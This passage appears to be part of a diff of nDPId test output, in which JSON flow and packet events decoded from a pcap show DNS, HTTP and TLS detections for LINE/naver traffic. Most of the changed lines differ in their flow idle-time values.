-01097{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1101,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104414296,"flow_last_seen":1470104414305,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":378,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1470104414305,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53626,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"799135475da362592a4be9199d258726","ja3s":"573a9f3f80037fb40d481e2054def5bb","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1087,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104414296,"flow_last_seen":1470104414296,"flow_idle_time":7560000,"flow_min_l4_payload_len":1093,"flow_max_l4_payload_len":1093,"flow_tot_l4_payload_len":1093,"flow_avg_l4_payload_len":1093,"midstream":1,"thread_ts_msec":1470104414296,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"31.13.87.36","src_port":53580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+01947{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1087,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":1,"flow_last_seen":1470104414296,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1159,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1159,"pkt_l4_len":1125,"thread_ts_msec":1470104414296,"pkt":"TF4M6gNlYMVHBbyMCABFAAR5Xv9AAEAGm5bAqAUQHw1XJNFMAbv8UmzuBJ2iMIAYEABHkgAAAQEIChoPmUJf7iUmFwMDBEAsTuFq8CapSbqPXvcdxKrSs42tBtoxpkpEhbC8nI\/Z9Ti9iLIQZa5j5LW58IaLnxvFb3pZI+B1RxFJh1MX7hfwSESpGA\/xdeEaXYqNDQOsIrAzCG5XHIwlKsfFfn\/8RQrusMspya+fP6t\/Zg2Y6qSh9wcmn8mXJja+baLib9aevB6ce5XBs3a64vsRCgFs5NXASh55KEqD8yMaqdrRhlWFE6xGr6+SpmMLlVUwh48nOg1sBDe\/WYgSpLNk63+28tyTAwCIcOk3y10vOsyt7ZjgvztDnWOLtsn7\/6kMi3u2RdUB7eGGzM2NovPfgy\/qKgW2LAn44liW9WewObR4bp+dPFEvC0Y3+SW5bib2uvhBosFVLRK5YrZcwALZJXqqXhrrs6bu\/ljawzwGUMfLGQ2WSbwafdg9dJ73rdMEF1vEvfkETGUyJeWyPgg2G2DdxVtAlhAOni2Cb6JW3jV3kUvfm9gPSADxqT1QqjMQAvLuAsUt5WChMz4yp18RafOK\/1ZUrwxEzqELsHqkpHQf4ILnKSgg5+kGWAcGpm5BV27qLCy+WyMYEnVR9nevFTvw2OV3haLNTqpyfd4K7vOAMw+dbscVa9MHAeqcd7IQnXV8FbWdFXkC4wCM4E8hTvbfJf2QumZQ2fXLtiYd3sw8qoFpqMjmllDchFzska7DS7GVif4h6CnDNlZ4V+i1Eng9ELpwqlbXjyiEgMAhv7fPmI8e61K\/2gGY8OMdxcNsyD40PLGc9n2gJgcjUdhv3yk5lS0wyxma1JJ1Pa0sEMzvHL8CT6BpEzwkMJEMkciKtJ6VsJyummJhpN5MU9bS0CfSvwU0ARZvT+jD4m9Xd2enHnLuDwg4KR5SAhfN1vXfVfNlzPARDhSaBSDDpj8POKqEg5amwWHcBAQbXCOcOftYxPyyUfYlmBS91ssyfM9KHAYAPjuptOjnLxGz2x9TbNHcI4nTKruVWTV9ktQaEfrdpb\/HDqnCQBNGReenZ\/zWZ\/GfJml4Cm+qteZq9C64lEHb9+XokUZOr8X2s3gyZpMYfRa5jmhmO9xmHg7WJrK4eIDuKfpKwBJ058yTVyD7l0KDSW9GneGAGkjet6prc4idVI6G79csJZdQxaibq52QgAy0phRLTPkicoq0gLlZcIZm+Mml46cJhhEv0H26dA+KCoM5R5DwKEyBjuFs1QF3Y4+SDB+bc1Wt792AR8qtKWp6gbS96vJnCeIhTEA3KFLfapTzgvIE4vSB7KreGQj+tnmHbTp1DHeV+7y4PmFv5on7p4A6CEwD6f6fjePEHDfs2g0EYheGp2VL2NvXgnD2ikpgTUWxxOX40I6u2o6OTbP2RNpQ9m8KCHjwUMiisO3DyvkoNm8lZ6ZPWkev9k5y7txVdM8LiyyQoSG929RxmQGshqjjCdAsjAk+bbGLy98uGf3QTIpvsX0AlZ7fP\/qiRzGtQg=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1088,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104414296,"flow_last_seen":1470104414296,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104414296,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53626,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1088,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1470104414296,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1470104414296,"pkt":"ABAj4ACgYMVHBbyMCABFAABAzwZAAEAGcgXAqAUQwKhzS9F6Abs0INrqAAAAALAC\/\/+nvgAAAgQFtAEDAwUBAQgKGg+ZQgAAAAAEAgAA"} 
+01404{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1089,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":2,"flow_last_seen":1470104414296,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":759,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":759,"pkt_l4_len":725,"thread_ts_msec":1470104414296,"pkt":"TF4M6gNlYMVHBbyMCABFAALpkqNAAEAGaYLAqAUQHw1XJNFMAbv8UnEzBJ2iMIAYEABq4wAAAQEIChoPmUJf7iUmFwMDArD5LAelFwFlufuyco4s\/\/Qvv+UsF7KG3W2aXVv9903LV87nxtNAIzAtPlUtxAIPT+QYQYOyjbvxtQ+Q3w2BeXCdTeBc2Vvhlyi2kFxwf1jLqB8jaDJwivP\/xGW9s5xZd+K0vcco68WAGVVhFXALDf8rp7nos7l2c3eCb9+ciqE2R8G8Pf4MZ5pCC83zl7gfBWwkh4JHUeVVNouVvCgmUz7pPOU27GiOZYmbf0iAqd6+kgzDqsVjJGMyvKT\/fOgiH+fRlxhK8fgLFTMvUw6JGt\/UsaYL4RE69L+mCP1NuNnyVxeorLPVKIVZ13X2miaLYk2DWr9BibPpp3QKFrWmy8E3NKq4Ls+dcN8upVmfmDj7xZcV58HYFhdLrgO56pzKogay7LJ\/Pef6DyPMYVTwySpdKas1Aq+IzlVKtxcR8k6I3pw5YMLWtutrLSrH5ABSNgfMJjpr7KO2g8MPyxfJHjp2vDiI+ruSCa4CqxUVcHS+ZRTOUS6b9R2wmUCu6Y6KCOkMK6zLaxdsVh2SuDnapzRD7fveixQuUMvdOAMX7X4K41IkMkOElwsydkORTyAInVQi4oBSOBugr0DMtesGCV044xeQCLnW8sd4RkMZjJZ4QhcfoxPlJX+f43AY0PNflsTA9yNhamZf4IabRxMggb\/lds0+jUTPyPfEWIc3bobDla0SyHhLFLXgk1Ee+Oe4AxYayqQxnLn\/4p\/VoNfV4WOaHdYeCMPZ3SK54BPrr3dXSTfyhV2DUhdJ\/67K7IkFW2cC4kKBJWWCDD28cyiCT6LF9mykZ0ExSXEgjBCLfnxWyJ4aekEg78E+rUf7kdSBDRTW3tDoKcMJPCumkIQ5L3nUbGzQ3I0QnDhkpOFdM4JoimsOVpik4zef5xLCds4Ul8v94jeMaHT0fOcIvOZn5GhO"} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1092,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":2,"flow_last_seen":1470104414301,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104414301,"pkt":"ABxCjnAxABAj4ACgCABFAAA0AABAAEAGQRjAqHNLwKgFEAG70XokV4DmNCDa64ASFtDXBQAAAgQFtAEBBAIBAwMH"} 
+00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1093,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":3,"flow_last_seen":1470104414301,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104414301,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0wvZAAFgGI+QfDVckwKgFEAG70UwEnaIw\/FJxM4AQAQMsTQAAAQEICl\/vEucaD5lC"} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1095,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":3,"flow_last_seen":1470104414301,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104414301,"pkt":"ABAj4ACgYMVHBbyMCABFAAAohwxAAEAGuhfAqAUQwKhzS9F6Abs0INrrJFeA51AQIAAOqAAAIEVKRkRF"} +00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1099,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104414296,"flow_last_seen":1470104414302,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1470104414302,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53626,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01097{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1101,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104414296,"flow_last_seen":1470104414305,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":378,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1470104414305,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53626,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"799135475da362592a4be9199d258726","ja3s":"573a9f3f80037fb40d481e2054def5bb","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1111,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104414395,"flow_last_seen":1470104414395,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1470104414395,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"168.95.1.1","src_port":63372,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1111,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":1,"flow_last_seen":1470104414395,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1470104414395,"pkt":"TF4M6gNlYMVHBbyMCABFAABL64oAAP8RYP7AqAUQqF8BAfeMADUAN6RcbYwBAAABAAAAAAAABmRsLW9icwhvZmZpY2lhbARsaW5lBW5hdmVyAmpwAAABAAE="} 00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1111,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104414395,"flow_last_seen":1470104414395,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1470104414395,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"168.95.1.1","src_port":63372,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"dl-obs.official.line.naver.jp","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00770{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1112,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":2,"flow_last_seen":1470104414402,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":289,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":289,"pkt_l4_len":255,"thread_ts_msec":1470104414402,"pkt":"ABxCjnAxTF4M6gNlCABFAAET0UQAAPgRgXyoXwEBwKgFEAA194wA\/yfZbYyBgAABAAYAAAAABmRsLW9icwhvZmZpY2lhbARsaW5lBW5hdmVyAmpwAAABAAHADAAFAAEAAUxDAC0GZGwtb2JzCG9mZmljaWFsBGxpbmUFbmF2ZXICanAJZWRnZXN1aXRlA25ldADAOwAFAAEAAACwADUKY2FjLWRsLW9icwhvZmZpY2lhbARsaW5lBW5hdmVyAmpwCWxpbmUtemVybwZha2FkbnPAY8B0AAUAAQAAAQAAEgVhMTg2NwJnMgZha2FtYWnAY8C1AAEAAQAAAAUABMtFUUnAtQABAAEAAAAFAATLRVFCwLUAAQABAAAABQAEPdw+2g=="} 00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1112,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104414395,"flow_last_seen":1470104414402,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":1470104414402,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"168.95.1.1","src_port":63372,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"dl-obs.official.line.naver.jp","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"203.69.81.73"}} 
-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1113,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104414404,"flow_last_seen":1470104414404,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104414404,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53627,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1113,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":1,"flow_last_seen":1470104414404,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1470104414404,"pkt":"TF4M6gNlYMVHBbyMCABFAABA+kNAAEAGXi3AqAUQy0VRSdF7AFCoMQrOAAAAALAC\/\/8cMAAAAgQFtAEDAwUBAQgKGg+ZqwAAAAAEAgAA"} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1116,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104414404,"flow_last_seen":1470104414404,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104414404,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53628,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1116,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":1,"flow_last_seen":1470104414404,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1470104414404,"pkt":"TF4M6gNlYMVHBbyMCABFAABAQJ1AAEAGF9TAqAUQy0VRSdF8AFD2CJDQAAAAALAC\/\/9IVAAAAgQFtAEDAwUBAQgKGg+ZrAAAAAAEAgAA"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1117,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":2,"flow_last_seen":1470104414407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1470104414407,"pkt":"ABxCjnAxTF4M6gNlCABFAAA8AABAADsGXXXLRVFJwKgFEABQ0Xu\/8FK8qDEKz6AScSAwjAAAAgQFtAQCCAobhF1GGg+ZqwEDAwU="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1118,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":3,"flow_last_seen":1470104414407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104414407,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0pGZAAEAGtBbAqAUQy0VRSdF7AFCoMQrPv\/BSvYAQEBXAXgAAAQEIChoPma4bhF1G"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1119,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":2,"flow_last_seen":1470104414407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1470104414407,"pkt":"ABxCjnAxTF4M6gNlCABFAAA8AABAADsGXXXLRVFJwKgFEABQ0Xzxz9ee9giQ0aAScSCl7QAAAgQFtAQCCAobhF1HGg+ZrAEDAwU="} 
-00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1120,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":3,"flow_last_seen":1470104414407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104414407,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0fmZAAEAG2hbAqAUQy0VRSdF8AFD2CJDR8c\/Xn4AQEBU1wQAAAQEIChoPma4bhF1H"} -00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1121,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104414404,"flow_last_seen":1470104414408,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1470104414408,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53628,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"dl-obs.official.line.naver.jp","url":"dl-obs.official.line.naver.jp\/r\/talk\/m\/4697716971500\/preview","code":0,"content_type":"","user_agent":"DESKTOP:MAC:10.10.5-YOSEMITE(4.7.2)"}} -00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1122,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104414404,"flow_last_seen":1470104414408,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1470104414408,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53627,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"dl-obs.official.line.naver.jp","url":"dl-obs.official.line.naver.jp\/r\/talk\/m\/4697716954688\/preview","code":0,"content_type":"","user_agent":"DESKTOP:MAC:10.10.5-YOSEMITE(4.7.2)"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1113,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104414404,"flow_last_seen":1470104414404,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104414404,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53627,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1113,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":1,"flow_last_seen":1470104414404,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1470104414404,"pkt":"TF4M6gNlYMVHBbyMCABFAABA+kNAAEAGXi3AqAUQy0VRSdF7AFCoMQrOAAAAALAC\/\/8cMAAAAgQFtAEDAwUBAQgKGg+ZqwAAAAAEAgAA"} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1116,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104414404,"flow_last_seen":1470104414404,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104414404,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53628,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1116,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":1,"flow_last_seen":1470104414404,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1470104414404,"pkt":"TF4M6gNlYMVHBbyMCABFAABAQJ1AAEAGF9TAqAUQy0VRSdF8AFD2CJDQAAAAALAC\/\/9IVAAAAgQFtAEDAwUBAQgKGg+ZrAAAAAAEAgAA"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1117,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":2,"flow_last_seen":1470104414407,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1470104414407,"pkt":"ABxCjnAxTF4M6gNlCABFAAA8AABAADsGXXXLRVFJwKgFEABQ0Xu\/8FK8qDEKz6AScSAwjAAAAgQFtAQCCAobhF1GGg+ZqwEDAwU="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1118,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":3,"flow_last_seen":1470104414407,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104414407,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0pGZAAEAGtBbAqAUQy0VRSdF7AFCoMQrPv\/BSvYAQEBXAXgAAAQEIChoPma4bhF1G"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1119,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":2,"flow_last_seen":1470104414407,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1470104414407,"pkt":"ABxCjnAxTF4M6gNlCABFAAA8AABAADsGXXXLRVFJwKgFEABQ0Xzxz9ee9giQ0aAScSCl7QAAAgQFtAQCCAobhF1HGg+ZrAEDAwU="} 
+00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1120,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":3,"flow_last_seen":1470104414407,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104414407,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0fmZAAEAG2hbAqAUQy0VRSdF8AFD2CJDR8c\/Xn4AQEBU1wQAAAQEIChoPma4bhF1H"} +00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1121,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104414404,"flow_last_seen":1470104414408,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1470104414408,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53628,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"dl-obs.official.line.naver.jp","url":"dl-obs.official.line.naver.jp\/r\/talk\/m\/4697716971500\/preview","code":0,"content_type":"","user_agent":"DESKTOP:MAC:10.10.5-YOSEMITE(4.7.2)"}} 